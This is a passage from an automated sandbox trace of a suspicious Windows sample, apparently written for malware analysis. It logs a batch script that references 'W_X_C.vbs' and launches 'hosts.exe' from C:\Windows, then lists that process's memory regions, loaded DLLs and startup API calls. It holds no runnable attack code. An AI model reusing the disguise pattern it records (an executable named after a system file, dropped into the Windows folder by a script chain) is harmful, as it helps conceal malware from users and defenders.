returned 1 [0172.281] GetProcessHeap () returned 0x700000 [0172.282] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x718dd8 | out: hHeap=0x700000) returned 1 [0172.282] GetProcessHeap () returned 0x700000 [0172.282] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7137a0 | out: hHeap=0x700000) returned 1 [0172.282] GetProcessHeap () returned 0x700000 [0172.282] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7126a0 | out: hHeap=0x700000) returned 1 [0172.282] GetProcessHeap () returned 0x700000 [0172.282] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7147d0 | out: hHeap=0x700000) returned 1 [0172.282] GetProcessHeap () returned 0x700000 [0172.282] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x701350 | out: hHeap=0x700000) returned 1 [0172.282] GetProcessHeap () returned 0x700000 [0172.282] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x713740 | out: hHeap=0x700000) returned 1 [0172.282] GetProcessHeap () returned 0x700000 [0172.282] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7136e0 | out: hHeap=0x700000) returned 1 [0172.283] _get_osfhandle (_FileHandle=3) returned 0x200 [0172.283] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x69 [0172.283] ReadFile (in: hFile=0x200, lpBuffer=0x4a3c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x33f310, lpOverlapped=0x0 | out: lpBuffer=0x4a3c6640*, lpNumberOfBytesRead=0x33f310*=0xe7, lpOverlapped=0x0) returned 1 [0172.285] SetFilePointer (in: hFile=0x200, lDistanceToMove=112, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70 [0172.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@exit\r\n", cbMultiByte=7, lpWideCharStr=0x4a3cc640, cchWideChar=8191 | out: lpWideCharStr="@exit\r\nW_X_C.vbs\r\nhosts.exe\r\n.exe goto NOFILE\r\n") returned 7 [0172.286] _get_osfhandle (_FileHandle=3) returned 0x200 [0172.286] GetFileType (hFile=0x200) returned 0x1 [0172.286] _get_osfhandle (_FileHandle=3) returned 0x200 [0172.286] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70 [0172.286] GetProcessHeap () returned 0x700000 [0172.286] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400a) returned 0x735c40 [0172.291] GetProcessHeap () returned 0x700000 [0172.291] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x735c40 | out: hHeap=0x700000) returned 1 [0172.294] _tell (_FileHandle=3) returned 112 [0172.295] _close (_FileHandle=3) returned 0 [0172.295] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0172.295] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0172.295] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0172.295] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0172.295] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0172.295] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0172.295] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0172.296] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0172.296] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0172.296] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0172.296] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0172.296] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0172.296] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0172.296] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0172.296] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0172.296] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0172.296] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0172.296] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0172.296] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0172.296] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0172.297] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0172.297] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0172.297] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0172.297] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0172.297] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0172.297] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0172.297] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0172.297] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0172.297] GetConsoleTitleW (in: lpConsoleTitle=0x33eef4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.447] exit (_Code=0) Thread: id = 74 os_tid = 0xb8c Thread: id = 75 os_tid = 0xcd4 Thread: id = 77 os_tid = 0xaf4 Process: id = "11" image_name = "hosts.exe" filename = "c:\\windows\\hosts.exe" page_root = "0x2987c000" os_pid = "0xb48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xb7c" cmd_line = "C:\\windows\\hosts.exe " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1738 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1739 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1740 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1741 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1742 start_va = 0x90000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1743 start_va = 0x290000 end_va = 0x293fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1744 start_va = 0x400000 end_va = 0xde0fff monitored = 1 entry_point = 0xdded44 region_type = mapped_file name = "hosts.exe" filename = "\\Windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe") Region: id = 1745 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1746 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1747 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1748 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1749 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1750 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1751 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1752 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1753 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1754 start_va = 0xdf0000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1755 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1756 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1757 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1758 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1759 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1760 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1761 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 1762 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1763 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 1772 start_va = 0xfa0000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 1773 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1774 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1775 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1776 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1777 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1778 start_va = 0x2a0000 end_va = 0x306fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1779 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1780 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1781 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1782 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1783 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1784 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1785 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1786 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1787 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1788 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1789 start_va = 0x775d0000 end_va = 0x7765efff monitored = 0 entry_point = 0x775d3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1790 start_va = 0x76c60000 end_va = 0x76dbbfff monitored = 0 entry_point = 0x76caba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1791 start_va = 0x75cc0000 end_va = 0x76909fff monitored = 0 entry_point = 0x75d41601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1792 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1793 start_va = 0x745b0000 end_va = 0x745b8fff monitored = 0 entry_point = 0x745b1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1801 start_va = 0x72940000 end_va = 0x72a92fff monitored = 1 entry_point = 0x72941af8 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 1802 start_va = 0x310000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1807 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1808 start_va = 0x12d0000 end_va = 0x1457fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Region: id = 1809 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1810 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1811 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1812 start_va = 0x1460000 end_va = 0x15e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001460000" filename = "" Region: id = 1813 start_va = 0x15f0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015f0000" filename = "" Region: id = 1817 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1818 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1819 start_va = 0x310000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1820 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1821 start_va = 0x29f0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 1822 start_va = 0x2df0000 end_va = 0x30befff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1823 start_va = 0x30c0000 end_va = 0x32dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 1824 start_va = 0xdf0000 end_va = 0xe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1825 start_va = 0xf20000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 1854 start_va = 0x75410000 end_va = 0x75493fff monitored = 0 entry_point = 0x754119a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1855 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1856 start_va = 0x3a0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1857 start_va = 0x75400000 end_va = 0x75404fff monitored = 0 entry_point = 0x754011d0 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 1858 start_va = 0xfa0000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 1859 start_va = 0x10d0000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1860 start_va = 0x30c0000 end_va = 0x31f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 1861 start_va = 0x32a0000 end_va = 0x32dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 1862 start_va = 0x32e0000 end_va = 0x33dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 1863 start_va = 0x7ebd0000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ebd0000" filename = "" Region: id = 1864 start_va = 0x33e0000 end_va = 0x34dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 1865 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1866 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1867 start_va = 0x744d0000 end_va = 0x7454ffff monitored = 0 entry_point = 0x744e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1868 start_va = 0x34e0000 end_va = 0x364ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 1869 start_va = 0x34e0000 end_va = 0x35befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034e0000" filename = "" Region: id = 1870 start_va = 0x3610000 end_va = 0x364ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 1871 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1872 start_va = 0x340000 end_va = 0x340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1873 start_va = 0x3650000 end_va = 0x37e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 1874 start_va = 0x350000 end_va = 0x350fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1875 start_va = 0x74670000 end_va = 0x7467afff monitored = 0 entry_point = 0x74671992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1975 start_va = 0x360000 end_va = 0x360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1976 start_va = 0x370000 end_va = 0x376fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1977 start_va = 0x360000 end_va = 0x360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1978 start_va = 0x370000 end_va = 0x376fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2041 start_va = 0x3b0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2042 start_va = 0x37f0000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 2043 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2063 start_va = 0xdf0000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 2064 start_va = 0xe50000 end_va = 0xe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 2065 start_va = 0x39f0000 end_va = 0x3beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039f0000" filename = "" Region: id = 2066 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2067 start_va = 0x3650000 end_va = 0x374ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 2068 start_va = 0x3760000 end_va = 0x37e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 2069 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2070 start_va = 0x72ec0000 end_va = 0x72f1efff monitored = 0 entry_point = 0x72ec2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 2071 start_va = 0x74490000 end_va = 0x744a2fff monitored = 0 entry_point = 0x74491d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2072 start_va = 0x370000 end_va = 0x374fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 2073 start_va = 0xe90000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 2074 start_va = 0x380000 end_va = 0x380fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2075 start_va = 0x77450000 end_va = 0x774d2fff monitored = 0 entry_point = 0x774523d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2076 start_va = 0xe30000 end_va = 0xe30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e30000" filename = "" Region: id = 2077 start_va = 0x75390000 end_va = 0x753b9fff monitored = 0 entry_point = 0x753913f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 2078 start_va = 0x10a0000 end_va = 0x10b4fff monitored = 0 entry_point = 0x10a13f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 2079 start_va = 0x3bf0000 end_va = 0x6474fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bf0000" filename = "" Region: id = 2080 start_va = 0x6480000 end_va = 0x8d04fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006480000" filename = "" Region: id = 2090 start_va = 0x3bf0000 end_va = 0x6474fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bf0000" filename = "" Region: id = 2091 start_va = 0x6480000 end_va = 0x8d04fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006480000" filename = "" Thread: id = 73 os_tid = 0xa9c [0167.914] GetVersion () returned 0x1db10106 [0167.915] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0167.915] GetProcAddress (hModule=0x75a80000, lpProcName="IsTNT") returned 0x0 [0167.915] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3a0000 [0167.915] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x29f0000 [0167.916] VirtualAlloc (lpAddress=0x29f0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x29f0000 [0167.923] GetCurrentThreadId () returned 0xa9c [0167.923] GetCommandLineA () returned="C:\\windows\\hosts.exe " [0167.923] GetEnvironmentStringsW () returned 0x10e5800* [0167.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\kEecfMwgj\\Desktop", cchWideChar=1516, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1516 [0167.924] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x5f0) returned 